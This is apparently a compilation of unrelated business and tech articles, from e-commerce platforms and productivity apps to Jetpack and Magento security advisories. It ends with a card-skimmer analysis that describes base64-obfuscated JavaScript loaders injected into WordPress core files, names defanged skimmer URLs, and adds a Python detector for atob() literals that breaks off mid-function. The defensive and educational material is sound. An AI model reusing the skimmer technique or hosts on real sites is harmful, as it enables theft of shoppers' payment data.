Looking for Shopify Alternatives? Try These Ecommerce Solutions


With over 800,000 businesses using the platform as 2020 begins, Shopify has become the go-to solution for many e-commerce store owners. The platform has grown considerably in recent years, with a vibrant app store helping to take stores to a new level. Yet, there are many excellent Shopify alternatives that may be a better fit for many online entrepreneurs.

Shopify won’t be for everyone and it can be wise to look at the competition before you make a commitment.

The following e-commerce solutions all have their merits, helping to make them viable Shopify Alternatives:

WooCommerce

WooCommerce is a plugin that turns a WordPress site into an e-commerce store.

The plugin is both free and open source, so it was able to grow quickly in popularity.

To get the absolute best functionality, though, you will need some additional paid add-ons.

There are numerous add-ons that can be used to simplify tasks, including email marketing, payment integration, and dropshipping.

Users who like WordPress will often choose WooCommerce to continue with a familiar platform.

BigCommerce

BigCommerce is a hosted solution used by many different stores from smaller businesses through to large brands.

Along with the attractive store themes you would expect, BigCommerce includes many more advanced features.

You can integrate with payment processors like Braintree, Square, and Stripe, while advanced shipping features ensure you get up-to-date shipping costs.

Additionally, the reports and metrics help you make the right decisions about your business based on analytics.

Zoey

Zoey is accessible to beginners, but comes with enough functionality to satisfy more experienced users.

The included templates are attractive and professional, with the ability to adapt them to your needs.

While it may appeal to beginners, the pricing may be prohibitive to newbies without a sales track record.

Similar to the previous options, there is an app marketplace featuring a variety of quality extensions.

Volusion

Volusion aims to make building and operating a store as easy as possible.

Site design can be performed without any knowledge of code, while the sites are all hosted on Volusion servers.

The tool also includes features for SEO and social media management.

Volusion integrates with the major payment processors, allows for easy inventory management, and has an optimized checkout experience.

SquareSpace

SquareSpace is an adaptable product that lets you develop an entire sales process.

This includes making comprehensive design changes and building a custom checkout process.

You can make much more than a simple store, adding options for digital products, recurring subscriptions, and blogging.

Similar to previous products, you can choose to integrate many extensions for payment processing, email marketing, and more.

Big Cartel

Big Cartel is one of the simpler e-commerce solutions, suited for smaller sellers who won’t need to scale up.

The tool is often used by artists and musicians to sell their products, with a free option to get started.

When you intend to grow a large store with complex inventory, payment, and data requirements, Big Cartel won’t be the solution for you.

However, smaller sellers can get started immediately using the simple design and store management tools.

Conclusion

While Shopify will be the perfect solution for many businesses, others may prefer to choose a different path.

All of the solutions mentioned can work for the majority of e-commerce stores, allowing them to grow as their sales increase.

Choosing the right platform is important as it can be frustrating making a change to an established business.

Finding the platform that offers the appearance, functionality, and features you require will ensure you are set up for maximum success.

Source: Business2Community

These 14 Apps Will Make 2020 Your Most Productive Year Ever


Thanks to leap year, you get an extra day in 2020. But even 366 days can go by quickly—and get nibbled away by the time you waste on repetitive tasks, distractions, daydreaming, or just the lack of a clear plan to get things done. There’s no shortage of apps promising to save your time or manage it better. But beware: Some are so involved that they may end up being time killers themselves.

These apps and services can help you avoid the perils of under- or over-managing your time—and many of them are free. Some automate tasks, saving you from chores like sorting emails or filling in forms. Others provide smart to-do lists that keep you on track for work or life goals. Yet others encourage healthy habits, from reining in unbridled smartphone checking to making sure you exercise and drink enough water. But enough chit-chat: on with the list.

Planning: Microsoft To Do
List-making will be your easiest to-do item on this free, streamlined app that synchronizes through the cloud across your devices. Just click to make lists of tasks, under categories like “Work” or “Personal,” set due dates and reminders, and break large items into smaller steps. You can also collaborate in online groups, assigning tasks to different members. Fans of soon-to-be-discontinued app Wunderlist, which Microsoft bought, will find this all familiar—and can easily migrate from their Wunderlist setup. (Android, iOS, Windows, Mac, web)

Planning: Any.Do
Resembling Microsoft To Do, this freemium app adds some nifty power features. Chief among them: it integrates with your phone’s calendar to create a single interface showing both appointments and to-do items. Any.Do offers subscription plans, beginning at $60 per year, with capabilities such as recurring reminders, location-based reminders (like “pick up milk” when you go by the store), productivity reports, and integration with business apps. (Android, iOS, Windows, Mac, web, smart watches, Alexa, Google Home, Slack)

Habit tracking: Productive
This app for Apple devices is a to-do list for the good things in life. It helps you get started with preconfigured to-do items such as “Eat fruits and veggies,” “Write in my journal,” and the elusive “Inbox zero.” You can configure any other good habits you like and set timeframes for each of them: daily, weekly, monthly, etc. A paid subscription (starting at $30 per year) adds nice-to-have bonuses, such as an unlimited number of habits and location-based reminders. (iOS, iPadOS, WatchOS)

Time tracking: Rescue Time
Use Rescue Time, and you’ll get a good overview of how well you’re managing your waking hours. The free app tracks both the programs you use and the sites you visit on your computer or smartphone—assigning them to categories such as Design & Composition (for instance, time spent in Microsoft Word and Photoshop) or Social Networking (time spent on Twitter or Facebook). The mobile app also tracks how many times you pick up your phone. A paid version ($72 per year) offers a few extras, such as alerts after you’ve spent a set amount of time in one app. (Android, iOS, Windows, Mac, Linux, Chrome, Firefox)

Focusing: Forest
This $2 app makes avoiding distraction into a game. Activate the timer, and a virtual tree starts growing onscreen. If you make it through the time period you set without fiddling with your phone (the default is 10 minutes), a full tree emerges. Give in to temptation, and dead wood appears instead. Use Forest to set aside focused work slots or phone-free time when with friends. A free Chrome extension provides the same benefits on your computer and can be set to block certain websites like Facebook while the timer is running. (Android, iOS, Chrome)

Project managing: Trello
Track multiphase projects—for yourself or a small team—with this freemium service. You can create boards with columns for different stages of projects, such as “Brainstorm,” “Consolidate Input,” and “Signoff,” then create cards for individual projects or parts of projects, such as “Develop marketing plan.” As work progresses, you can drag items from column to column and assign team members to various parts of the projects. Trello’s free tier offers plenty for individuals and small teams. Paid plans start at $10 per user per month. (Android, iOS, Windows, Mac, web)

Scheduling: Doodle
Spare the long email chains when setting up a meeting. This freemium service lets you post an online calendar with possible meeting times and allow everyone who receives the link to check off what works for them. Upgrading to a paid account (starting at $48 per year) adds handy features such as syncing doodles to your online calendar and automatically emailing calendar invites to participants. Paying also eliminates the onslaught of advertising on the site. (Android, iOS, web)

Email sorting: Edison Mail
This free app (formerly called EasilyDo Mail) sorts your inbox into categories such as Travel, Bills & Receipts, Entertainment, and Subscriptions. Each box extracts relevant information—displaying upcoming and past flight and hotel reservations, for instance, or providing unsubscribe buttons for newsletters. Edison supports webmail like Gmail, Outlook, and Yahoo, as well as Exchange and IMAP email from your business domain. Note: Edison collects anonymized data to support its online trends data service, and formerly allowed human staffers to read user emails in order to train its machine learning. (Android, iOS, MacOS)

Researching: Pocket
It’s easy to find information on the web. And Mozilla’s free bookmarking service, which is integrated into the Firefox browser and available as an extension for Chrome, makes it easy to keep track of it until you have time to give it your full attention. Just click the icon to save a copy of any page to your online account. You can also add tags to organize the saved pages by topics. The mobile app allows you to browse from your phone and save pages from your mobile browser. (Android, iOS, web, Firefox, Chrome)

Researching: Google Alerts
Rather than skimming through the news or running manual searches, let Google compile research and automatically send an email digest. Just visit the search engine’s Alerts page, sign in with your free Google account, and enter search terms for the topics you want to follow. You can include multiple terms (such as names of companies) for each alert, configure as many alerts as you want, and refine alerts based on features such as regions or languages to include. (Web)

Networking: LinkedIn QR codes
Forget business cards (which you probably have already done anyway), and make connections instead through the QR code scanner in LinkedIn’s mobile app. Just tap the icon on the right end of the search bar to display your personal code for people to scan and to capture the code displayed on their screen. Invites to connect go out automatically from there. (Android, iOS)

Accessing Google: Google Assistant
The font of all knowledge is a constant companion for many of us. This voice-activated app provides the quickest way to access many of Google’s services, especially if you are on your phone or your hands are full (or you’re driving). Beyond web searches, you can ask Assistant to do things like check the weather, find movie times, provide driving directions, set reminders, and translate text or audio. You can also access utilities like timers or alarms, a calculator, or smart home controls. (Android, iOS, Google Home speakers, Wear OS)

Form filling: LastPass
Password managers are an essential tool to create, store, and auto-fill strong passwords for website logins. They also save time with lots of other online form filling, such as entering your address for deliveries or your credit card information for payments. The free LastPass app allows you to create profiles for this and other categories of information that you can enter with one click of its browser plugin button. The app itself is locked down with a main password, and all data you store in it is encrypted. Paid upgrade features for LastPass ($36 per year) are minimal, such as ability to share access with other people. (Android, iOS, MacOS, web, browser plug-ins)

Scanning: TurboScan
Sometimes the best way to file papers is to convert them into files. This $6 Android and iOS app uses your phone’s camera to create color or black-and-white PDF files of any documents you photograph, even something like a whiteboard. It stores searchable copies on your phone and also allows easy sharing via email, AirDrop, or cloud services like Dropbox and Evernote. (Android, iOS)

Source: www.fastcompany.com

Small Business Technology Trends for 2020


As the owner of a small business, you are always looking for ways to improve your company. Here we’ve highlighted some of the key tech trends in 2020 for exactly that. Whether you’ve just launched your startup or are trying to keep your business at the forefront of innovation, new technology is constantly being created for you to take advantage of. Below we’ve highlighted some of the new ways you can grow your market, improve efficiency and protect your company.

Influencer marketing

Scrolling through your social media, you expect to find promotional and branded content. Today the highest-paid athletes in the world, such as Cristiano Ronaldo, make more on Instagram than on the field. The technique of using a big name to sell something is not new; however, social media platforms allow ads to appear on your screen with far more ease and subtlety than traditional advertising. Instead of your company hiring a celebrity to appear in a commercial, that celebrity only needs to post online about the benefits of your product or service. This new age of advertising presents enormous benefits for your company if utilized well.

So why is having influencer outreach important? It’s simple; the experience is personalized. You have no choice when you’re watching TV regarding what pops up during a commercial break. But on social media, consumers have chosen who they follow. Maybe they follow someone because they appreciate their taste, their lifestyle or because they know them personally. All of these attributes cultivate a deeper trust towards a brand when a promotion comes from someone the consumer has actively elected to see in their day to day social media goings.

If you’re a small business, it’s most likely you can’t afford the assistance of celebrities or high profile influencers to grow your product, but that’s okay. Micro-influencers or influencers with smaller followings (think under 100,000 followers) often have a more loyal fan base and higher levels of engagement. Furthermore, those who follow micro-influencers are more likely to share a niche interest, and with proper market research you can reach an audience interested in checking out your brand.

Finally, keeping your brand active on social media is also important for those who might discover or further explore your business on such platforms. Just like when you meet someone new and search them up on social media, consumers are constantly checking out new businesses first through social media.

Digital healthcare

There are several benefits of the rise of digital healthcare that all small business owners should be aware of. Not only can it save time and money, but digital healthcare solutions are enabling fundamental changes to the job market that directly benefit small businesses.

There’s never a moment to waste when you’re running a small business. Digital healthcare is increasingly becoming an affordable way for employees to stay healthy while maintaining efficiency. In the past, if an employee of yours fell sick or experienced any number of conditions, they would have to take time off work to drive to the doctor’s office, sit around as they wait for their appointment, see the nurse, and sit around some more before finally being treated. This is all changing as new telehealth companies like PlushCare offer remote services for your employees.

This means an employee can see the doctor from their office. Online doctor appointments typically last 15 minutes, with patients receiving a diagnosis and treatment plan, including any necessary prescriptions, in this time frame. By seeing a doctor from work, employees save incredible amounts of time that can be spent working. Furthermore, remote appointments are not limited to a single doctor’s hours, and your employees will find it easy to book with a remote doctor before or after their workday. These appointments are cheaper for your business and your employees while also providing instant access to care. But there’s another aspect to telehealth, and that is its relationship with small businesses.

Digital healthcare solutions make healthcare more affordable for the growing workforce of contractors and freelancers who forgo employer-based insurance. More people feel comfortable giving up the comforts of traditional employment, such as health insurance, because they have an affordable alternative in digital healthcare. This is highly beneficial to small businesses that cannot afford to give their workers health insurance. Having access to a network of contractors and freelancers saves your company money but also allows you to hire the people necessary to get the job done at a reduced cost. If you are hiring via the gig economy, be sure to talk to your contractors about digital healthcare as an affordable healthcare solution, especially if you are not offering health insurance to these workers.

Cybersecurity

The importance of cybersecurity cannot be overstated. As 2020 rolls around, the functioning of big and small businesses alike will continue to move online. New software solutions are being developed to unify the functions of companies, allowing smoother communication across integrated platforms. While this process is great for your business overall, such centralization also demonstrates the need for increased cybersecurity measures. According to a poll from Insureon, only 16% of small business owners think they are at risk of a cyberattack. Unfortunately, 61% of cyberattacks are actually launched against small businesses, and the average cost of a small hack is $86,500, according to internet security firm Kaspersky Labs. While such a cost might not hurt a major corporation, it could be a devastating amount for your small business.

There are several steps you can take to protect your business from cyberattacks:

  • Regularly update your software. Installing new software versions as they become available is critical to protecting your data. Delaying even the most routine updates can have catastrophic effects.
  • Ensure point-of-sale systems are safe. Businesses that perform transactions online should invest in end-to-end encryption software. Not only does this safeguard your business, but it also protects your consumers and their trust in your services.
  • Teach employees how to spot malware and phishing. Small business owners have to be proactive in the protection of their company, including looking inwards at potential risks for human error. Hold a seminar with your employees to discuss what dangerous malware might disguise itself as.
  • Hire an IT expert. If your company can afford to do so, hiring an IT expert is a must as the world continually shifts into the digital age. As a business owner, you don’t have the time or knowledge to do everything on your own, and no one can help keep your tech safer than an IT expert.

Being in the know about the different technological channels you can utilize in 2020 sets your business apart. Promoting and growing your brand via influencer marketing grants you access to a concentrated market of potential consumers and clients. Knowing how to maintain efficiency and affordability while keeping your employees healthy and factoring in the wellbeing of contractors in the gig economy sets you up to have highly satisfied workers at a lower price point. A cybersecurity approach that protects your company against data breaches and hacks from the ground up ensures all aspects of your business are high functioning. Small businesses with a comprehensive approach and knowledge of the latest tech trends as they apply to a range of aspects of the business are better positioned to outperform those that take a narrow approach.

Source: www.business.com

Why Your Company’s Online Reputation Matters


As a discipline, reputation management is still nascent in the Asia Pacific region. Caught up in the rallying cry to go digital, many brands are eager to appear in search results, but they are comparatively less focused on the realities of what exactly consumers see.

To the extent that some brands in the region do practice reputation management, most relegate it to a single person or department, such as customer service, digital marketing, or human resources. While engaging in any form of reputation management is a good start, it should not be compartmentalized into a specific box on the organizational chart.

Reputation management should be a companywide responsibility that affects several, if not all, external-facing departments. Many founders or C-level executives balk at the idea of committing significant resources to what they might assume is merely a cosmetic benefit. But this stereotype could not be farther from the truth.

First Impressions Go Digital

When a stakeholder hears about your brand for the first time—be they a potential customer, employee, partner, or investor—they will almost always Google your company to learn more. What they see in the search results is essentially their first impression, except it’s even weightier than the first impressions we make as businesspeople at meetings, events, or conferences.

Unlike in-person meetings, where you can offset an initially bad first impression as you share more about yourself over the course of a conversation, there are no such opportunities online. Stakeholders who are put off by a negative employee review or a critical feature from a journalist when searching your brand will not give you a chance to explain yourself. They’ll simply click away from your site. Our attention spans online last a couple seconds at most, and you just wasted the few that someone gave you.

A negative or erroneous perception on the internet can stagnate growth and immediately compromise sales and marketing efforts. It can also scare away an investor or cause the perfect candidate to apply to a competitor. Despite the importance of reputation management, the only way for employees to understand its significance is to get it from the top down. Company leaders must communicate the importance of reputation management and operationalize it into a key performance indicator.

Each department should be assigned relevant channels for reputation management. For example, human resources can monitor Glassdoor and LinkedIn; digital marketing can keep an eye on Facebook, Twitter, and Google; and public relations can watch media outlets. The responsible departments must report on their assigned channels. The sharing of such vital information is a constant reminder that everyone must work together to build, improve and protect their brand’s online reputation. A key point to note here is that companies often fail because they don’t consult experts. Imagine a company engaging their HR team to do financial audits without having them trained or monitored by a finance expert. Similarly, it is important to engage digital reputation experts in your strategy development process.

In galvanizing the entire organization to practice reputation management, leaders must emphasize a proactive rather than reactive approach. The latter is all too common, especially in Asia. Brands take action only during a reputation crisis or when a dissenting view appears online. Only then will they spring to action, summoning whatever resources they can to respond to the critical opinion, bury it amid more positive content, or work to delete the negativity if libelous or otherwise erroneous.

Rather than just responding to online issues as they arise, brands must be proactive, beginning with developing an overall online brand: What is it that they want to be known for? Determining a company’s messaging is just as important for reputation management as it is for public relations or any other communications function. Skipping this step—as many companies do in their rush to respond to dissenting online voices—also leads to poor branding and subsequent performance. Your company will come across as just another entity in a business world eager to uphold appearances rather than an organization responding from a place of genuine authenticity.

The messaging that you devise for your reputation management should be treated as a living document. Your company should evaluate how its mission, vision, and values are reflected on the internet every quarter, or even more frequently if your company is experiencing rapid growth. Done correctly, proactive reputation management will create an online brand that all of your team members will be proud of. It will also mobilize your community of employees, clients, partners, and other stakeholders to further support the success of your company.

Source: www.enterpreneur.com

Millions of Sites Exposed by Flaw in Jetpack WordPress Plugin


Admins and owners of WordPress websites are urged to immediately apply the Jetpack 7.9.1 critical security update to prevent potential attacks that could abuse a vulnerability that has existed since Jetpack 5.1.

You can update your installation to the 7.9.1 version through your dashboard, or manually download the Jetpack 7.9.1 release here.

Jetpack is an extremely popular WordPress plugin that provides free security, performance, and site management features including site backups, secure logins, malware scanning, and brute-force attack protection.

The plugin has over 5 million active installations. It was developed and is currently maintained by Automattic, the company behind WordPress.

Not yet exploited in the wild

The vulnerability was found in the way Jetpack processed embed code and Adham Sadaqah was the one credited for responsibly disclosing the security issue.

To protect the sites that haven’t yet updated, few details about the security flaw were disclosed, but the announcement made by Jetpack says that the bug impacts all versions since the 5.1 release, dating back to July 2017.

The Jetpack developers state that, up to the release of the critical Jetpack 7.9.1 security update, they had found no evidence that the vulnerability had been exploited in the wild.

Active Jetpack versions

“However, now that the update has been released, it is only a matter of time before someone tries to take advantage of this vulnerability,” the developers warn.

The development team also says that they worked with the WordPress.org Security Team to release patches for every version of Jetpack since 5.1 and that “most websites have been or will soon be automatically updated to a secured version.”

Millions already patched

At the moment over four million out of the more than five million WordPress websites that use Jetpack have already been updated according to its entry on the WordPress Plugins site.

“Versions released today include 5.1.1, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, 5.7.2, 5.8.1, 5.9.1, 6.0.1, 6.1.2, 6.2.2, 6.3.4, 6.4.3, 6.5.1, 6.6.2, 6.7.1, 6.8.2, 6.9.1, 7.0.2, 7.1.2, 7.2.2, 7.3.2, 7.4.2, 7.5.4, 7.6.1, 7.7.3, 7.8.1, 7.9.1,” the Jetpack dev team says.
Jetpack downloads history
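
As an added example (not code from Jetpack or from the article), the per-branch list of patched releases quoted above can be turned into an inventory check that flags sites still running an affected build. The site names and the inventory are constructed, and treating branches newer than 7.9 as patched is an assumption, since they shipped after the fix.

```python
import re

# Patched releases exactly as quoted in the article, one per affected branch.
PATCHED_RELEASES = (
    "5.1.1, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, 5.7.2, 5.8.1, 5.9.1, "
    "6.0.1, 6.1.2, 6.2.2, 6.3.4, 6.4.3, 6.5.1, 6.6.2, 6.7.1, 6.8.2, 6.9.1, "
    "7.0.2, 7.1.2, 7.2.2, 7.3.2, 7.4.2, 7.5.4, 7.6.1, 7.7.3, 7.8.1, 7.9.1"
)

# Accept "7.9" or "7.9.1"; anything else (betas, extra components) is rejected.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_version(text):
    """Return (major, minor, patch) or None if the string is not a plain version."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        return None
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


# Map each affected branch (major, minor) to the first patch level with the fix.
FIXED_PATCH = {}
for _release in PATCHED_RELEASES.split(","):
    _major, _minor, _patch = parse_version(_release)
    FIXED_PATCH[(_major, _minor)] = _patch

FIRST_AFFECTED_BRANCH = (5, 1)             # the article: flaw exists since 5.1
LAST_LISTED_BRANCH = max(FIXED_PATCH)      # (7, 9)


def classify(version_text):
    """Classify an installed Jetpack version against the quoted patch list."""
    parsed = parse_version(version_text)
    if parsed is None:
        return "unknown"                   # pre-release or malformed: check by hand
    branch, patch = parsed[:2], parsed[2]
    if branch < FIRST_AFFECTED_BRANCH:
        return "not-affected"              # older than the first affected release
    if branch > LAST_LISTED_BRANCH:
        return "patched"                   # assumption: released after the fix
    fixed = FIXED_PATCH.get(branch)
    if fixed is None:
        return "unknown"                   # branch not in the quoted list
    return "patched" if patch >= fixed else "vulnerable"


def needs_attention(inventory):
    """Return sorted (site, version, status) rows that are vulnerable or unknown."""
    rows = []
    for site, version in inventory.items():
        status = classify(version)
        if status in ("vulnerable", "unknown"):
            rows.append((site, version, status))
    return sorted(rows)


# Constructed inventory: site name -> Jetpack version reported by that site.
SAMPLE_INVENTORY = {
    "shop.example.test": "7.9",
    "blog.example.test": "7.9.1",
    "legacy.example.test": "5.0.1",
    "press.example.test": "6.3.3",
    "stage.example.test": "7.5-beta1",
}

if __name__ == "__main__":
    for site, version, status in needs_attention(SAMPLE_INVENTORY):
        print(f"{site}: Jetpack {version} -> {status}")
```

A site on an affected branch only needs the patched release for that same branch, which is why the check compares patch levels per branch rather than against 7.9.1 alone.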

Jetpack received another security update to address an issue found during an internal audit of the Contact Form block in December 2018, and a critical security update patching a vulnerability in the way some Jetpack shortcodes were processed in May 2016.

Last year, hackers also found a method of installing backdoored plugins on WordPress websites using weakly protected WordPress.com accounts and the Jetpack plugin’s remote management feature.

Source: www.bleepingcomputer.com

Cyber Security Trends 2020 – How Unprepared Are We?


Spending on cybersecurity is on an explosive rise. When new ransomware attacks occur every 14 seconds, followed by infiltration attempts on large volumes of data that put millions of people at risk, cybersecurity ought to be discussed. As we head into 2020, the scope of discussion has gone beyond upcoming security products and services to new innovations in hacking. If you haven’t woken up to combat such attacks, you could be the next target.

Before 2019 ends, the US alone will have spent USD 45 billion, and that’s not just any other market cap figure. As per IDC, global spending on cybersecurity will touch USD 103 billion.

Increased Router-based attacks

Positioned at the heart of network operations, routers monitor all the devices on the network and hence are low-hanging fruit for hackers. Since they aren’t updated as frequently as recommended, routers are prone to a series of attacks. Moreover, there is a swathe of models from different brands, which makes it complicated for manufacturers to upgrade or offer replacements for older devices.

Such attacks aim to retrieve configuration files by exploiting protocols such as SNMP and SMI. As per a report from Akamai, flaws in UPnP implementations allowed hackers to inject NAT rules, affecting 65,000 routers and leaving 4.8 million more at risk.

Last year, Kaspersky reported a similar attack wherein systems in Russia and Iran were left with an ASCII rendition of the American flag followed by the message ‘Don’t mess with our elections’.

Given the increase in attacks on routers, users at homes, agencies and offices must take essential steps to ensure basic security. Beyond just changing the default router password in settings, it’s high time that users act proactively and learn about the security of their routers. They can access the router settings via the default IP address 192.168.1.1, which is preset by the router companies.

From there, enabling WPA2 encryption, updating the router, and using a VPN and other third-party services can help to cut down the risks by 70%. In certain cases, changing the default IP altogether can curb the vulnerabilities.

Growth of 5G & increasing threats in the cloud

With impressive infrastructure deployments already in progress, 5G is prepared to grow in major markets such as India. In fact, IoT device manufacturers are experimenting with devices that connect directly to 5G networks and no longer depend on Wi-Fi routers. However, eliminating the central point of network control at homes and small offices has raised fears of making devices prone to more attacks. Routers are helpful in monitoring all the devices in the network, and their absence means screening each one of them manually.

Following up with abundant data streaming capacities provided by 5G networks, cloud storage may not be the securest of all anymore. Given such bandwidth efficiency to back-up, upload and download huge volumes of data, hackers have already discovered their newer targets. At the enterprise level, this gets scarier as on-premise migration to the cloud continues to grow explosively. However, by 2020, 80% of such deals will attach network firewalls and secure web gateways to cloud-based access security brokers (CASBs).

Increasing use of mobile as an attack vector

By the end of 2018, mobiles had already topped the list of potential gateways for infiltration and hacking attempts. Since all our communications, whether personal or professional, have moved to mobile, we are inching towards a greater risk of unintentionally exposing ourselves to the unknown. As per the RSA’s Current State of Cybercrime Whitepaper, 70% of fraudulent transactions were triggered by a mobile device in 2018. Not to mention the 680% rise in fraud from mobile apps since 2015.

Phishing is back – stronger & scarier

Phishing may be old, yet it is still practiced at full throttle. In fact, it has expanded into different versions such as smishing (phishing through SMS) or vishing (phishing through live calls). As per Verizon’s Data Breach Investigation Report 2019, phishing accounts for 32% of data breaches and 78% of cyberespionage incidents. These actions across emails, SMSs, social media posts and IRS phone calls lure the victim to give up personal information such as login credentials, or OTPs including transactions. Despite aggressive awareness campaigning, impersonating a reputed brand to extract valuable information from the customer hasn’t stopped, and it doesn’t look like stopping in 2020.

Going forward – hacking will get more innovative

Before you thought of deploying AI to predict attacks, hackers had already implemented strategies to dodge your preparations. Besides being used to automate phishing (sending emails and social media messages), AI could scan millions of systems, identify the most vulnerable ones and launch mass data infiltration attacks. Such abuse of artificial intelligence calls for an equally strong defense: 50% of enterprises pledge to use AI tools to secure their systems.

 

Source: Business2Community

Google plans to give slow websites a new badge of shame in Chrome


Google is experimenting with a badge of shame for websites that load slowly in Chrome. “In the future, Chrome may identify sites that typically load fast or slow for users with clear badging,” explains a blog post from the Chrome team. “This may take a number of forms and we plan to experiment with different options, to determine which provides the most value to our users.”

A new badge could appear in the future that’s designed to highlight sites that are “authored in a way that makes them slow generally.” Google will look at historical load latencies to figure out which sites are guilty of slow load times and flag them, and the Chrome team is also exploring identifying sites that will load slowly based on device hardware or network connectivity.

Google is experimenting with having a loading screen (splash screen) to warn Chrome users, or a loading progress bar that would appear green if the site is fast and, presumably, red if it’s slow. “We are building out speed badging in close collaboration with other teams exploring labelling the quality of experiences at Google,” explains the Chrome team. “We are being very mindful with our approach to setting the bar for what is considered a good user experience and hope to land on something that is practically achievable by all developers.”

It’s not clear exactly when this new badging system will appear in Chrome, but Google unveiled its plans at the company’s Chrome Dev Summit in San Francisco today. The company has carefully worded its announcement with lots of “may” hedges, so it’s likely Google is looking for immediate feedback from web developers before it progresses.

Google also unveiled its vision for the future of Chrome today, and it appears the company is focusing on WebAssembly, powerful capabilities, and Progressive Web Apps (PWAs). Hopefully this will mean even more powerful web apps soon, and ones that feel a lot more like native apps.

Source: The Verge

Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks


The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.

While the company didn’t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the Magecart association of threat groups, which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers’ payment card details and other information entered into the fields on the page.

The vulnerability (CVE-2019-8144), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant’s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.

The flaw affects Magento 2.3, and was patched in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, released in October. The company warned that patching will have the side effect of “blocking administrators from viewing previews for products, blocks and dynamic blocks”; but, it said it will re-enable the preview functionality as soon as possible.

“We recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,” Piotr Kaminski of the Magento security team wrote in a posting on Monday. “Applying this hot fix or upgrading…will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.”

The same update patches several other critical remote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (XSS) issues.

The warning comes as Magecart activity and infrastructure continue to saturate the web. According to analysis from RiskIQ last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart’s JavaScript binaries, with over 18,000 e-commerce hosts directly breached.

“It is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. “As a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.”
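The periodic checksum comparison described in the quote above can be sketched as follows. This is an added example, not code from the article or from Magento; the directory layout and file names in `demo()` are constructed, and the `*.js` pattern is an assumption about which files to watch.

```python
import hashlib
import json
import tempfile
from pathlib import Path

def sha256_file(path):
    """Return the hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root, patterns=("*.js",)):
    """Map each matching file (path relative to root) to its digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for pat in patterns
        for p in sorted(root.rglob(pat))
        if p.is_file()
    }

def compare(baseline, current):
    """Return (modified, added, removed) relative paths, each sorted."""
    modified = sorted(k for k in baseline if k in current and baseline[k] != current[k])
    added = sorted(k for k in current if k not in baseline)
    removed = sorted(k for k in baseline if k not in current)
    return modified, added, removed

def demo():
    """Constructed web root: take a baseline, change two things, re-check."""
    with tempfile.TemporaryDirectory() as d:
        js = Path(d, "static", "js")
        js.mkdir(parents=True)
        (js / "checkout.js").write_text("function pay(){}")
        (js / "vendor.js").write_text("/* vendor bundle */")
        baseline = snapshot(d)
        # Simulate code prepended to an existing script plus a newly dropped file.
        target = js / "checkout.js"
        target.write_text("/* injected */" + target.read_text())
        (js / "extra.js").write_text("/* unexpected */")
        return compare(baseline, snapshot(d))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The check is only as trustworthy as the baseline, so the baseline should be recorded from a known-good deployment and stored where the web server account cannot write to it.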

Credit Skimmers Vulnerability


We often write about malware that steals payment information from sites built with Magento and other types of e-commerce CMS.

When discussing credit card skimmers like Magecart, it’s sometimes overlooked that WordPress also has a decent share in the ecommerce segment. There are numerous popular plugins that can easily turn a WordPress site into a full-featured online store. In fact, WooCommerce alone has over 5 million installations.

Credit Card Skimmer Injected in WordPress Core

Our friend Salvador Aguilar over at Kinsta recently shared a few samples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js.

These JavaScript files both contained the following injected code, found at the very top.

[Image: injected malware found in wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js]

This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script. In this case, it is decoded to “hxxps://zendesk-chart[.]com/top/aco.js”.

Common Skimmer Variants Found on Magento

We regularly find these types of injected scripts on Magento sites. They use variations of atob (base64) obfuscation, along with hundreds of different domains and customised URLs.

For example, on one Magento site we found a nearly identical copy of the skimmer script (referenced above), with only a slight variation. This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), which works with the checkout form for that particular site.
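One way to hunt for the atob pattern described above is to decode every base64 string literal passed to atob() and flag URLs whose host is not on the site's own allow-list. This is an added example, not the original authors' tooling; the sample snippets and the `.example` hosts are constructed placeholders, and the allow-list is an assumption about the store's legitimate script origins.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Matches atob("...") / atob('...') with a base64 string literal argument.
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=]{8,})\1\s*\)""")

def decode_atob_literals(js_source):
    """Yield the decoded text of every atob() literal that is valid base64."""
    for m in ATOB_RE.finditer(js_source):
        try:
            raw = base64.b64decode(m.group(2), validate=True)
            yield raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 text; ignore

def suspicious_hosts(js_source, allowed_hosts):
    """Return hosts of URLs hidden in atob() literals that are not allow-listed."""
    hits = []
    for text in decode_atob_literals(js_source):
        url = urlparse(text.strip())
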